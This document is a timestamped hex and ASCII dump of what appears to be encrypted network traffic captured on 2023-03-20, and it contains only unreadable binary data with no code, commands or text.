                                      2023-03-20 10:23:12 UTC58INData Raw: d6 e5 fc 39 89 2a a9 af 28 f8 5a c4 0f 08 a9 e5 90 5f c5 31 9f f0 79 b6 07 75 41 33 46 44 66 62 ff cb eb be 6d b4 a8 12 ae 2a 0c 51 e3 c2 82 4e 5b 5b 20 9e 2c a1 e0 6f 27 c0 8d 32 87 79 db c5 46 b6 a2 9f b5 54 a3 96 5a b6 24 e0 6a 9a f4 22 c9 94 2b da 2e b7 c8 c5 3e 8a 50 fa 9c 9f 0d 6c d6 3f a1 30 af e0 39 33 af e6 17 cb ba 26 e2 59 6b 7a cc b9 4d e4 fa 3a 40 77 81 9c 68 97 2f 09 77 4d 69 09 51 a5 51 dd 73 d5 27 7f 0f 4c e3 61 7c 6d 08 43 22 b7 8b 1b 30 f4 a0 55 b8 de d0 ae 32 cc 6f 08 ab 5b 0a ed 20 cf 63 9e 70 6d 85 3d 0d 39 09 06 b5 e9 1b 06 06 d1 64 7a 42 29 04 87 37 f3 fc 5a da 59 fd de 60 64 37 38 f4 37 78 a2 44 8d 3d 09 05 d1 7e 13 03 85 81 83 d0 a1 69 f5 fb b0 4d dd c2 b9 bc b2 91 92 c8 83 e2 3a c2 d9 8d 7d 24 f8 54 a5 29 14 a2 89 33 5d 3a be 05
                                      Data Ascii: 9*(Z_1yuA3FDfbm*QN[[ ,o'2yFTZ$j"+.>Pl?093&YkzM:@wh/wMiQQs'La|mC"0U2o[ cpm=9dzB)7ZY`d787xD=~iM:}$T)3]:
                                      2023-03-20 10:23:12 UTC59INData Raw: e2 66 a3 77 71 d6 ba 28 9e 3c 5c d2 81 8c 31 5a 2b 10 2f eb 0d c9 8c 4e d6 ce b9 f9 2d 86 31 79 60 1a 09 1a 90 13 11 de b1 28 b4 7c bd 98 21 bf 25 38 68 4b 02 b0 a3 ce da cc 2a 38 5d 3e fb 15 a3 de 41 78 a4 da 56 79 0f 69 07 ae 9e 3c 1f c8 29 70 ee 18 c3 e2 37 ad 4a c8 f2 82 cb de e2 a8 06 cf 11 9f ea 32 1b 5f 85 ce 93 88 a9 ee e8 02 a1 c4 85 c1 59 82 53 7f d0 a1 62 bc db e2 a4 14 b9 e5 0d 54 3a a2 c4 d3 06 df 1f 23 c3 22 23 d4 57 f2 79 e6 49 82 81 15 88 93 71 45 e0 0d fb 5c 35 73 88 30 5c 81 ec 5b 9f 90 a1 11 d7 50 45 f7 d1 08 91 f0 af f4 93 9e 2d cc 8f 9b 21 1b 0d 4a b4 41 29 0d 36 a9 94 7d 22 28 fb e8 15 67 8c e6 78 49 07 c3 c2 f7 df eb e1 6f be 88 10 59 98 72 64 e6 a1 82 b9 7f 60 ac 0f 25 b0 c0 0b 2e 19 57 1b 50 d3 92 d0 0d 89 fd 76 a3 20 b5 02 2d bc
                                      Data Ascii: fwq(<\1Z+/N-1y`(|!%8hK*8]>AxVyi<)p7J2_YSbT:#"#WyIqE\5s0\[PE-!JA)6}"(gxIoYrd`%.WPv -
                                      2023-03-20 10:23:12 UTC60INData Raw: 3d d8 59 58 ea 87 7b 80 24 1a 7e b5 14 da c7 22 5b 01 24 de e7 c3 71 95 18 a3 96 5e e5 53 3c 26 2e ae ed b6 3d 7f 3b 8c ed 60 b4 15 6a 79 c8 58 67 92 72 c5 d6 c0 37 7b ab 88 2b a6 3a 0e 43 fc de 79 50 7b ae 52 18 27 b0 e2 6b 79 cc 87 3e 9d 6a cf d2 48 a8 43 90 67 7b 9e 9f 1e 59 3a ef 7f 89 9b ea cc 8f df b4 ad bd ca eb b2 e5 89 f0 b0 51 7e d0 d2 3f b6 22 da c7 38 1f a0 81 ac d1 a9 25 f1 58 71 70 21 af 61 f1 ed 35 ad 73 ad 8b 6f 9b 2a ee 65 76 6b 33 43 82 e9 dd 8d 06 02 44 1a 21 57 50 79 6b cd 2c fb b7 e2 11 5f 4a b7 46 b5 ed a9 77 23 c7 73 99 1b 76 0e eb 24 d1 77 87 72 71 92 d2 1b 02 f5 2c 9b cb 80 70 05 f9 97 71 5a 3c 3b 23 27 e4 e5 5e 22 5c f9 20 77 77 36 0f 5f 25 6f a4 5e 85 37 7a 21 fd 75 15 27 e6 96 8b c0 a9 f8 95 c0 84 4c cc df a2 21 25 9d 95 cd 9a
                                      Data Ascii: =YX{$~"[$q^S<&.=;`jyXgr7{+:CyP{R'ky>jHCg{Y:Q~?"8%Xqp!a5so*evk3CD!WPyk,_JFw#sv$wrq,pqZ<;#'^"\ ww6_%o^7z!u'L!%
                                      2023-03-20 10:23:12 UTC61INData Raw: 36 4b 81 35 3e 2d 78 c3 55 fe 36 1c 16 d6 77 14 dd f4 58 9a 37 a3 5b 7e b2 a1 f1 9e 36 5c a5 23 9b 31 4d 2e 05 c0 e3 4e 6f 9c 5a c1 cd 4c 2b 31 95 2d 16 de 0d 13 e2 87 50 c0 e6 7d 20 db d3 a7 8b 31 a8 5b f7 76 b5 09 f3 07 c8 f2 ad 33 57 82 33 e4 16 df 67 40 69 b4 d2 30 5e 0e 45 07 c8 16 9c 1d ce 3a 60 ec 23 25 e2 26 b1 73 93 02 74 38 e0 90 bf 1c da 68 35 fb 24 09 b0 89 f3 9b 9b b5 d2 97 10 b7 c2 87 c7 5e 6c 7f 5b c0 b2 6e 72 72 e0 b5 02 b7 ff f5 4a 0e 88 c8 d7 3e eb e6 cf 27 f7 fd 41 56 f2 59 e1 5e 47 5a 97 57 c6 73 47 c0 61 f1 59 f2 56 cc 38 74 e6 c6 51 99 ff 09 38 dc 56 7c c2 ea 55 93 83 05 d5 10 69 e4 3c b1 e9 25 23 2b 5b a5 57 b5 2c 27 af b5 95 3d 0f d1 ae 7a 40 86 c8 76 d5 06 c5 ec ee d8 fa ef 0d 2b a9 fb 52 ae 6b 5d 94 cc 13 be 10 f8 c2 57 22 a3 c2
                                      Data Ascii: 6K5>-xU6wX7[~6\#1M.NoZL+1-P} 1[v3W3g@i0^E:`#%&st8h5$^l[nrrJ>'AVY^GZWsGaYV8tQ8V|Ui<%#+[W,'=z@v+Rk]W"
                                      2023-03-20 10:23:12 UTC63INData Raw: 45 90 5a 8d 81 bd c2 a6 40 c9 99 ae 44 5f d7 01 73 b9 ad 3d cf ec 58 f4 72 7a ab 29 f5 76 b1 4e dc dc 2a 49 87 25 de e1 7e 7a 8d 0f a4 9e b7 fb 76 c9 21 15 ab cd e1 31 60 37 3d e0 6b a5 05 62 ae 37 75 42 86 ee de c1 98 25 67 ac a9 38 b6 21 e1 55 cf d8 81 48 55 8d 56 b3 26 b6 46 64 74 d3 8e 33 74 6b f2 d5 51 af 9d a7 47 70 85 b8 10 f4 3b e9 db 80 fd 38 cc 88 c9 25 03 90 c5 eb bf aa 4a fc 95 51 39 1e d1 3f b6 97 a8 15 38 18 b2 10 1c fc a6 25 f4 68 12 60 17 b2 49 81 f8 2d 55 d0 98 86 6d 8f 25 09 77 4d 64 24 4c bd 9f 2f a9 20 09 34 13 4e fe f3 62 66 db 44 34 49 e3 37 33 e5 a1 4d b3 f2 d9 a4 dd c6 55 f4 81 72 36 d9 c8 23 97 98 49 76 92 c3 06 3f 0b 2d a4 f2 f0 04 f6 f9 9d 7b 46 2f 2c 32 20 f8 c2 b0 dc 5d d5 27 66 73 cf 11 7c 3c 67 ad c2 9f 29 84 21 db 66 19 0f
                                      Data Ascii: EZ@D_s=Xrz)vN*I%~zv!1`7=kb7uB%g8!UHUV&Fdt3tkQGp;8%JQ9?8%h`I-Um%wMd$L/ 4NbfD4I73MUr6#Iv?-{F/,2 ]'fs|<g)!f
                                      2023-03-20 10:23:12 UTC64INData Raw: 25 f8 8f e6 83 d9 4d 0a 6c 3d 21 5e e9 ff 8a da 61 54 b0 36 41 a9 5e 4f 44 7f eb 55 91 5c 17 1a c1 7b 12 d7 e5 48 92 da 5c 76 5b fe ab 4d 9e 3c 52 9d 0d 8a 14 56 10 7f 3c e2 64 18 37 4e d0 dc f6 01 2a a3 31 3e ae 19 09 1a ae 5e c8 de bb 02 1a d4 99 92 0f c9 48 e1 6e 63 2d df 0c c5 a9 a3 33 57 8e 51 91 1e cc 7b 5f 6c a8 cd 3f bf 06 97 0c ed 10 43 a3 ce 3a 7b c6 46 32 c7 3d 8f 0b 6f 03 5e 40 4c 83 aa 02 e9 07 34 cf 38 39 2f 8a df 9b b1 84 c6 8e 09 81 d0 97 f4 42 ba 1f 75 c4 b4 51 44 64 e0 ae 67 c1 f4 0b 41 4d e0 e2 d2 0c ca 13 3a d8 f9 91 c2 a9 f3 73 cd 24 25 5c b1 8e b3 84 40 e5 7a dd 18 3d 5b ef 4c e6 87 c4 55 bf 7f ac 1c d6 78 24 ff e8 53 bb d2 af d4 1a 4f 70 3e 82 f0 0b 7a 09 59 a3 7f 81 28 36 a3 e6 07 31 2a d1 e9 71 43 86 c4 06 5e 0d c5 ec e2 c7 15 ea
                                      Data Ascii: %Ml=!^aT6A^ODU\{H\v[M<RV<d7N*1>^Hnc-3WQ{_l?C:{F2=o^@L489/BuQDdgAM:s$%\@z=[LUx$SOp>zY(61*qC^
                                      2023-03-20 10:23:12 UTC65INData Raw: ef 54 31 91 64 d2 e6 71 c8 60 46 a7 93 a4 79 d8 e5 27 e0 7d 51 72 af 81 bd cf 99 33 37 bd 88 60 38 c8 03 5d e4 89 3d c9 44 34 97 78 7a a6 5b 61 76 9d 4f c5 c9 22 61 f8 3a 20 e6 f0 5b f8 b3 a3 87 4d da e2 c0 02 08 81 84 98 30 66 4f 25 fa 60 a1 22 df 52 13 53 63 f9 61 d3 c7 b0 06 6d b4 a8
                                      Data Ascii: T1dq`Fy'}Qr37`8]=D4xz[avO"a: [M0fO%`"RScam
                                      2023-03-20 10:23:12 UTC65INData Raw: 18 f3 3b 3a 5e cb b2 85 51 51 8d 04 b2 26 ba 97 11 7e d3 83 42 e0 6b de cf 48 ba b7 91 4d 4e 71 91 5d c8 45 53 79 9f f0 13 a7 8d f0 d1 2a dd c8 ed a3 f4 ea f0 b0 5f 31 61 d1 1a ba 1d d4 1c 38 19 82 cc 1d d0 a3 03 d3 4a 4b 66 1a d9 63 e0 fc 05 76 72 81 87 1e e1 3e f7 7c 0e 01 23 54 97 ed 29 8c 2c 3e 42 ef 4f d4 6e 07 d1 db 43 26 97 dd 1d 15 ef 9e 27 b1 f5 c0 d0 99 c7 79 f2 8a 56 08 c8 3d f4 09 9c 61 60 ba e1 0c 15 01 0d 76 c4 d6 0e 2d 98 9f 7b 44 07 09 23 36 f9 89 39 dd 5d df 48 0b 65 31 1a 4f 2e 72 a4 49 84 d7 85 0c d2 7e 05 05 81 91 94 db 5b e6 b0 d1 b8 49 e5 f8 45 cd 24 b6 ba f0 8f eb 4a 5d d0 9a 24 29 f1 5a a0 12 df fc 82 37 75 c3 b9 1a a7 d9 68 19 33 1b b2 9e 34 a2 ff 3f f1 d9 b1 ab b3 03 a7 79 a6 0b cd 83 53 19 d8 2e ae 58 d6 33 03 0d e4 7e fd 70 87
                                      Data Ascii: ;:^QQ&~BkHMNq]ESy*_1a8JKfcvr>|#T),>BOnC&'yV=a`v-{D#69]He1O.rI~[IE$J]$)Z7uh34?yS.X3~p
                                      2023-03-20 10:23:12 UTC66INData Raw: b1 bf 22 db f8 96 8b 17 ab 4a d0 68 4b 08 af 0c cf cb dc 39 7c a6 3e fc 08 32 70 6c 70 d1 a1 38 a0 05 63 15 ca 2f 3a 09 30 3b 53 e5 30 24 e9 37 a0 72 93 02 74 3c dd 81 81 da cf 7d 31 85 5d 10 4e 82 f5 83 9b 8e b6 8f 03 ab e8 ac d3 60 e2 7f 77 ce b0 7a 49 ef e1 a4 12 82 e6 3b 49 22 a5 e3 d2 06 d4 19 30 c9 e9 84 fd 7f f2 59 e5 a4 98 70 bf 88 90 59 86 c0 70 ff 51 b1 5a e9 34 44 8d c4 57 89 6e aa 15 df 50 52 f7 e8 53 8b 0e ae f8 12 44 f5 12 71 d0 23 08 3b 5c a5 17 a4 28 36 ad 95 6e 21 3c d0 ad 22 42 81 d9 e7 4a 2b da e8 fe c8 66 e6 1c 2d 88 1a 59 9d 49 a2 f5 ce 19 1a 79 70 ac 8f 24 b0 c0 30 bc 20 c0 1d 48 d8 80 cb 33 2e fd 5a aa 33 b6 1b 39 93 e6 47 21 b3 09 70 fc ea db 1b f6 17 6d b1 62 76 ee 7e cd ef cc a7 22 54 bf 37 4e 1f 56 6d 8e 00 a5 f1 91 04 57 dd e6
                                      Data Ascii: "JhK9|>2plp8c/:0;S0$7rt<}1]N`wzI;I"0YpYpQZ4DWnPRSDq#;\(6n!<"BJ+f-YIyp$0 H3.Z39G!pmbv~"T7NVmW
                                      2023-03-20 10:23:12 UTC68INData Raw: 87 ed 48 30 03 75 56 1e 24 4a 98 69 f3 8b e1 01 67 9c c3 3a b1 3c 3f e2 65 09 72 79 36 a7 21 b4 49 d7 e4 78 75 71 98 27 9d 32 cd cf 46 b9 ac 96 49 7d 1e 91 71 f0 54 91 78 9f fe 6a d4 d5 e7 72 13 b5 e2 e2 a5 8a 7b e6 a3 50 29 ab d3 3f b0 24 bc 0f 33 85 b5 fe 35 c3 a8 23 e8 59 68 7d 3a e2 39 f3 f6 3c 5a 63 8a 9a 35 12 20 e7 5e 72 6a 22 5e 8c f7 32 84 70 79 46 1c 5f f3 49 21 7c d2 cd 4b 98 f4 0a 39 f4 bd 5e eb 6f d9 be 0b d4 78 f6 a0 66 08 fc 3f 86 30 b5 69 77 94 d2 0a 04 03 77 ef d1 fd 2c f5 f9 9d 71 40 29 43 5f 37 f3 f0 41 d1 4c db 36 6c 3d 27 38 c5 37 78 a2 20 a3 29 84 2a c2 71 10 09 ee eb 8a c6 af f6 90 c2 9e 5d d1 91 ab 1a 4e 9d b9 c6 a3 96 2d 5e da 89 35 38 fe 67 8d 09 e8 85 f0 4e 50 c9 97 64 a9 27 6f 15 83 e3 d5 6b 1c c7 dd 52 8d 93 dc 83 d2 0b d9 83
                                      Data Ascii: H0uV$Jig:<?ery6!Ixuq'2FI}qTxjr{P)?$35#Yh}:9<Zc5 ^rj"^2pyF_I!|K9^oxf?0iww,q@)C_7AL6l='87x )*q]N-^58gNPd'okR
                                      2023-03-20 10:23:12 UTC69INData Raw: 9c 6d 8f 4e c8 cb de 20 3c 8e 23 e8 ce 37 03 02 0b 59 c8 de b0 28 c2 c0 b4 98 36 a0 50 1f 69 67 0d c9 00 d4 c9 c2 32 46 8c 25 05 1e e0 7e 47 6e 5c cc 3e bf 06 97 0f a1 03 36 03 dd 32 7f f7 38 2e 1c 36 8b 74 6a 14 6b 7d f0 95 a8 7d 09 7e 35 ee 31 80 51 f7 80 4f 05 a0 d0 a6 84 a0 c2 9c fb 56 81 76 77 d5 ba 65 9f 65 cc a2 02 c2 df 16 58 2a 8a f2 da 10 2b 18 1c dc ff 99 c5 5f f2 4e fa 44 67 5d 9d 88 b8 74 7f 9a 8f 0a 86 38 44 e0 01 5e 90 c8 46 92 8d b8 3d ca 43 40 f5 c4 42 95 e6 ad af d0 6f f7 3d a3 ed 7a 8a 97 5d b2 0e 5a 23 34 a9 82 7d 35 29 c8 80 1f 55 df dd 1e 73 7a c5 ea fd ce ec fc 45 2e bb 5a 59 9a 64 77 8e 0e 13 b8 7b 77 c4 c6 2d a7 93 05 6d 3e df 44 33 01 a0 33 25 d0 fc 7f b6 2c fe 73 66 96 85 79 20 9f 0f 4a f9 d6 47 a0 f4 23 72 ee 57 69 b1 1c 1e 8f
                                      Data Ascii: mN <#7Y(6Pig2F%~Gn\>628.6tjk}}~51QOVvweeX*+_NDg]t8D^F=C@Bo=z]Z#4}5)UszE.ZYdw{w-m>D33%,sfy JG#rWi
                                      2023-03-20 10:23:12 UTC70INData Raw: f6 d2 7b 8d f1 a2 ab 40 c2 98 c7 27 02 b6 e9 89 3e 60 20 91 e5 5d 5b 03 59 2c 34 22 8e 98 63 d7 c6 91 7c e2 e2 a2 38 b3 12 97 55 e3 d9 85 2a 97 a5 21 b6 37 b4 97 fc 7e d3 83 3c 8d 19 57 c4 57 b9 95 1b 4a 55 85 81 79 e0 ad 9c f0 9e f4 39 e4 05 d4 db 08 ad c2 fa 33 f9 d9 f1 b0 51 39 f5 d2 3f ba 24 bd 06 ae 6c 23 ef 1d da 81 a9 e3 48 64 7d 3a a1 f7 93 73 2c 53 78 a9 07 6c 88 35 df fd 60 6b 28 45 95 eb b5 e5 45 af 55 11 44 85 9f 79 6d df 5c 1c a4 ec 1b 21 eb a9 48 4d f4 ea a4 32 c3 7a ae b9 73 11 e2 24 d2 68 8f 6f 79 98 3d 0d 39 0d 3b ba dd f8 17 0b f9 8c 75 5d 32 d2 22 1a e7 f8 41 d4 4c dc b1 49 c4 30 10 56 0f c0 a7 4f 92 36 9a 33 df 7e 03 01 9e b5 75 c7 89 f0 8d db 82 45 df b3 7e 32 db 98 a8 c8 9a e2 ba 37 41 f4 ba 36 d2 58 b8 18 f6 ab 9e 3e 8b c2 93 03 ad
                                      Data Ascii: {@'>` ][Y,4"c|8U*!7~<WWJUy93Q9?$l#Hd}:s,Sxl5`k(EEUDym\!HM2zs$hoy=9;u]2"ALI0VO63~uE~27A6X>
                                      2023-03-20 10:23:12 UTC71INData Raw: c3 b1 73 68 d5 c6 ff 9e 2d 58 a2 28 73 30 70 3f 08 2d eb 7d 7f 9e 40 d0 c9 d8 3f 67 78 3a 3a f3 19 0b 1f 97 71 a6 86 d8 38 f3 4a bd 98 21 db ce e0 68 41 1f ac 89 ce da c0 1a db 85 3e f1 1d b7 b3 40 78 a6 be bc a1 0f 63 25 4c 2e 3d 15 e6 b4 7e e6 3a 1b 43 36 a7 6c 72 48 4b 30 f6 92 a4 19 d5 80 34 c6 23 00 46 99 d6 0b 86 af ac b0 8b 5a 3d 69 ce 55 81 70 77 d5 bc 66 77 9a e1 88 05 aa e4 0f 22 33 8f cb 48 07 d5 1f 23 df e0 99 c5 59 f2 4e fc 45 80 a2 b0 a6 99 60 41 d7 28 e6 7c 20 41 fa 3c 5c 96 ca 4e b8 6e aa 15 d5 68 3d 06 17 aa 8c d8 bc da 10 7e f9 26 b9 04 22 37 2f 48 ad 46 ad 39 3e b8 9c f8 2f 27 b1 df 77 61 86 ce 19 4b 07 c5 ea bd 84 87 c3 8c 2c 89 1a 35 14 7e 6a e6 c0 13 a9 71 79 fc a9 25 9c c1 11 3a 1f 45 19 50 d3 9f 8c 36 de fc 67 a7 24 5f 11 15 87 fc
                                      Data Ascii: sh-X(s0p?-}@?gx::q8J!hA>@xc%L.=~:C6lrHK04#FZ=iUpwfw"3H#YNE`A(| A<\Nnh=~&"7/HF9>/'waK,5~jqy%:EP6g$_
                                      2023-03-20 10:23:12 UTC73INData Raw: c8 4e 4d c7 43 87 53 cb 14 79 8e 4b da d6 26 7e da da df cb d0 75 8f 15 9d 1f b2 05 a5 dd 02 11 a7 e5 8b 3e 7f 18 61 fb 4c e1 00 0e 95 36 59 4f 9f 6a 8b 4e ce 24 6d b6 8a d0 b1 3a 15 56 98 13 87 51 53 b4 25 c1 a2 b1 e4 72 6e d4 fa a4 8b 6a d4 ed dd b2 bd 9b 63 de 8e 90 7b e7 33 f9 ef f6 9b bd cc 8f df a6 c8 bc ca e9 ba a0 43 fe b0 4a 1f 60 ff c1 b1 19 f1 1c 43 da aa ee 19 d7 a0 7b 6d 1e 6e 6c 30 90 e9 e1 fa 27 51 09 41 8d 6d 8c 2e f3 05 e5 6a 22 5e 8c f6 50 05 2b 21 5f 39 c4 f9 51 73 45 50 42 22 bd f3 13 26 73 df 29 3d f5 c6 a4 5e 0d 79 f6 ae 68 23 fe 39 dc 79 90 7e 57 6c c2 20 47 09 56 72 c2 f3 00 02 f0 c5 f4 14 2f 2c 21 1e 1b fa 50 d6 5f ae e7 61 64 35 01 54 45 fc a5 4f 98 38 83 53 58 7f 12 05 a9 1d 8a c6 af f6 94 c5 05 3f 54 c9 bd 38 f3 16 b8 c0 81 c3
                                      Data Ascii: NMCSyK&~u>aL6YOjN$m:VQS%rnjc{3CJ`C{mnl0'QAm.j"^P+!_9QsEPB"&s)=^yh#9y~Wl GVr/,!P_ad5TEO8SX?T8
                                      2023-03-20 10:23:12 UTC74INData Raw: 46 a0 0c b3 7a 7e eb 5d ef 32 98 73 dc 3d 15 85 68 43 8d c9 a3 0a a7 c1 d5 f5 81 16 45 af 30 9c 23 43 2d e0 3f ce 6d 64 9c 4b b9 f0 49 21 2d 80 28 10 d0 0d 1a 0e 86 6d da c1 bb dc da ff ba 8e 2a b7 41 f2 7a 4b 19 cd 13 eb 24 cb 1e 5e bc a2 f2 1f cc 6e 65 6b b0 cd 28 b2 18 97 0c ed 3c 3f 64 0e 3a 7f e2 33 5a 73 28 aa 2a 4c 00 58 3e ee 90 b8 06 d8 6c 2a c4 cc 10 62 92 ce 99 88 ab 49 db 03 a1 c0 ed 19 48 92 7a 68 cd d8 47 9c 6c e0 a4 0b 87 e6 19 4b 33 98 fc e6 f8 d4 35 6d da 84 48 d6 57 f6 58 fb 02 16 0b b1 8a 91 0a 97 c0 70 f1 68 32 73 01 32 5c 8d c6 2a 5f 90 ab 3d cd 55 36 79 e9 55 99 e1 a7 a7 99 6e f7 33 8f 70 22 1b 01 48 ae 24 21 29 36 a3 bd e4 31 2a d1 ae 90 43 86 c4 08 4f 16 c8 65 a8 df eb e9 67 ea 89 10 5b e2 0e fb f5 ce 19 1a 60 53 d0 45 24 a1 d8 00
                                      Data Ascii: Fz~]2s=hCE0#C-?mdKI!-(m*AzK$^nek(<?d:3Zs(*LX>l*bIHzhGlK35mHWXph2s2\*_=U6yUn3p"H$!)61*COeg[`SE$
                                      2023-03-20 10:23:12 UTC75INData Raw: d2 5b 8d 8b 95 4f b8 49 3d b0 09 49 59 c0 1b 73 55 ad 3d cf 9f 54 ef 66 32 bf 26 0b 66 8f 5a f9 39 29 4d c8 35 da f6 d6 eb d3 0f a3 85 58 fe 4b c8 a8 57 a9 e5 98 4b a8 31 9f fe 7f a9 68 2c 3c 15 59 4b 98 63 d3 c1 98 64 36 d8 8a a8 b0 3a 15 3e 9e 14 87 51 53 ba 05 a1 34 b0 f5 6a 60 cf 77 2c a6 60 cf c2 40 eb ae 97 54 48 9c 82 71 e7 29 f0 56 61 f5 1f d1 8d c4 df 13 b1 45 b8 a5 8a 52 8b 78 5b 11 7b fb 9f b1 35 b3 24 95 e3 55 11 02 e0 ba 31 e2 59 7c 73 79 46 60 cc b7 2f 51 71 f2 09 6c 88 35 e9 05 e4 6a 22 5e b5 7b 22 8c 20 09 de 10 4e f2 4b 51 f4 da 43 24 c4 66 1a 30 ef a1 35 36 f4 c6 a4 0b 4b 78 f6 a0 75 75 2f 37 dc 6c ed e4 67 92 c9 24 98 0a 2d bd ea 7d 05 05 f3 b5 d8 43 2f 2a 05 29 bf e9 42 dc 4c c7 3b 9f 65 1d 0a 52 4a be a4 4f 96 2b ff e6 d1 7e 16 81 e8
                                      Data Ascii: [OI=IYsU=Tf2&fZ9)M5XKWK1h,<YKcd6:>QS4j`w,`@THq)VaERx[{5$U1Y|syF`/Qql5j"^{" NKQC$f056Kxuu/7lg$-}C/*)BL;eRJO+~
                                      2023-03-20 10:23:12 UTC76INData Raw: e9 8d df ac 56 18 00 4c c1 5a bc e3 d7 ef b1 49 cb 99 13 47 81 c7 3d 2d 74 49 40 c2 25 04 1a da 76 1d fb 1b 4f a1 db b3 7e 66 c6 c4 f7 c7 56 0e aa 5a d5 22 55 27 39 2d f0 62 77 9f 58 2e d9 fa 24 2d 91 28 04 cf 0a 1b 03 ca 82 c9 f2 b3 09 de eb d9 6d d8 57 5d cb 68 4b 08 cc 3c cd da fa 32 57 84 43 fb 1f dd 67 4b 53 80 cd 3e b7 f1 68 21 c9 5c a9 1e ce 30 75 fe 3b 33 e5 21 59 6b 41 00 58 29 fd 83 ad 1e 37 7f 19 e8 19 13 65 54 d9 9f f6 8e c7 8e 09 8b d1 a6 d3 48 a3 7e 77 c4 cc 79 61 75 f6 af 3f 8b f5 0c 5c dc 8b cf db 04 a6 8c 31 d8 f5 84 ce 5c f2 58 e4 a4 98 70 b2 8a 84 7a 47 c7 68 0b 78 13 59 c2 30 77 5c c2 52 f0 b8 aa 39 d6 7a 45 fd e8 4e a3 f3 af b1 10 6f f7 07 a7 fa 32 0d 18 5d 8e 7b a4 39 32 be 6b 6f 1c 24 fb a3 9d 98 73 e6 78 49 07 c3 e0 e5 cc ef eb 0d
                                      Data Ascii: VLZIG=-tI@%vO~fVZ"U'9-bwX.$-(mW]hK<2WCgKS>h!\0u;3!YkAX)7eTH~wyau?\1\XpzGhxY0w\R9zENo2]{92ko$sxI
                                      2023-03-20 10:23:12 UTC77INData Raw: 7a 3f 3c 65 d4 9e da ce ee 2b 90 89 cb 85 d2 cd 4c 8d d0 56 5a 8b d9 b6 fd 22 49 37 98 84 27 f6 cb 03 5d bf 1f 3c c9 48 54 f4 68 70 b0 5b a7 76 9d 43 cb cd 2b 66 e9 7c 4f 88 72 65 86 09 b2 8d 26 6c 5b c2 2d 01 ae f2 c2 a1 ed 14 9f fa 61 a9 05 6d 08 35 5e 5c c0 f2 8b c2 16 4d 5d b3 a1 3f a6 62 8e 7f e4 d0 09 38 50 bd 79 eb 2b b3 e3 60 27 db 9f 24 a2 49 df c5 5d b5 d2 3e 4a 55 89 ff e6 f7 3b e5 6a 98 f2 5c 63 8e d5 dd 13 bb 44 84 b2 d3 3f 29 b0 5b 1b 77 bc 8d b1 35 b3 19 2f 47 ac 81 b2 d1 a9 25 f3 4f e0 05 25 e1 0e 39 fa 2d 59 1d 2c 8c 6d 8e 67 fc 71 76 33 29 53 9e 7f 4a b3 76 dc aa ee 48 d2 4f 7b 16 03 43 22 b3 c8 39 32 e6 cb 9e b3 f5 c2 84 3d c5 02 2f aa 77 0a c7 15 de 6b e3 b8 66 92 c7 26 0b 09 56 6d c2 f3 00 2f db 9f 78 3f f5 2c 23 32 d9 e4 52 a7 86 d5
                                      Data Ascii: z?<e+LVZ"I7']<HThp[vC+f|Ore&l[-am5^\M]?b8Py+`'$I]>JU;j\cD?)[w5/G%O%9-Y,mgqv3)SJvHO{C"92=/wkf&Vm/x?,#2R
                                      2023-03-20 10:23:12 UTC79INData Raw: 16 c8 8c ad e2 c9 2d 3e 54 65 4b 92 6e d2 ec 7f f7 df 01 fe e6 d7 a1 d9 47 2a 4d d3 21 7b e1 d7 9a db 45 c7 9b 1d 41 a9 54 3c 36 4e ef 5f 42 36 16 1a 49 64 02 cc f3 5d 8a e2 e7 77 66 c6 c2 0f 9f 10 53 a9 3a 95 22 5b 38 0f 39 fb 9c 67 a1 47 a3 fd d7 20 27 8a 21 05 c8 1b 18 1b 9e 82 c9 f2 b8 51 cd d2 bc 92 2c b1 59 e6 68 5a 0f c9 f2 ce f6 ce 32 40 97 39 fb 0e cb 6b be 79 8e cf 12 a2 24 d0 7e d5 2e 3d 15 dd 3c 6e e0 38 34 e6 58 0d 6a 6d 09 37 16 f7 83 a0 69 38 7e 35 e0 23 17 56 e7 12 9d 99 ac d7 88 1b ce 0e 96 d1 42 83 78 7a c3 b1 16 cb 64 e0 ae 07 ac fc 64 d4 23 8a e9 c1 03 c4 1c 21 dc e9 9f d2 d9 9b 30 3d 5a 99 56 bb 54 9e 78 28 f2 71 f5 73 37 34 49 33 5c 8d 18 8f 95 98 87 3f d4 3f 5d fd e8 5f 4f f6 87 8a 11 6f fd 13 a6 e6 23 1b 09 59 26 57 bd b4 36 a4 95
                                      Data Ascii: ->TeKnG*M!{EAT<6N_B6Id]wfS:"[89gG '!Q,YhZ2@9ky$~.=<n84Xjm7i8~5#VBxzdd#!0=ZVTx(qs74I3\??]_Oo#Y&W6
                                      2023-03-20 10:23:12 UTC80INData Raw: f7 06 25 2f ad a0 14 56 eb 99 33 1f d5 62 de 93 5a 82 8d 7d 50 93 e3 d4 98 da de 73 47 bf 82 a5 5c d2 cd 57 e7 60 a9 5b a1 90 bf e0 c2 96 37 98 86 4b 01 b7 dc 5b cc a8 23 da 4b 47 ef 7c 63 52 35 27 66 9f 3e 3a c7 28 65 fc 5f 01 e7 dc 60 df 03 b9 94 4c fa 4b c7 3b fc a8 c9 8d 32 1b ef 9f fa 64 a7 79 aa 50 36 5d 4d 8e 60 fb d9 99 24 67 a9 b1 3d b1 2b 1a 4f 1d d2 ab 56 54 ad 0e fc 3a a3 e1 78 6e d6 93 d3 8b 46 d4 cd 41 8d 55 91 4b 55 94 83 74 f6 2a ea 67 61 f5 1f ca 89 ff c4 0b af cf ed b4 8f 47 0e b1 77 1b 7c 5e 1a b0 35 b4 14 20 0c af ee 0c d5 b1 dd e3 64 6b 7a 39 a1 72 e5 fa 3c 56 6d 88 73 6c b1 af f7 76 61 69 59 8a 9d f1 27 8e 51 fe 55 11 4a fe 47 71 45 c3 42 22 bd e0 19 26 c0 a5 42 ce 15 c6 ae 27 d6 7d 8b 75 77 0e e9 30 d4 30 95 59 1b 92 c3 0c 16 0c 74
                                      Data Ascii: %/V3bZ}PsG\W`[7K[#KG|cR5'f>:(e_`LK;2dyP6]M`$g=+OVT:xnFAUKUt*gaGw|^5 dkz9r<VmslvaiY'QUJGqEB"&B'}uw00Yt
                                      2023-03-20 10:23:12 UTC81INData Raw: 38 7b 93 69 0e d8 a0 49 8e 3e 24 96 43 9b 5a 57 b2 be 9d 12 30 8b 8d a5 97 17 24 6f 0c 49 83 60 a3 88 7f db c1 07 47 0e 14 54 f1 2c 02 4c c5 52 dc e2 d7 e1 a2 7e 5b 8b 1b 41 b8 5c 20 d3 7f c7 41 f9 38 12 14 cf ea 6b cf e1 5f 88 d8 a7 f9 1e d5 c3 e3 98 2a 7e 56 31 8d 37 4f 3f 03 2d ea 62 77 85 51 d9 26 d7 0c 21 97 3d 9b ea
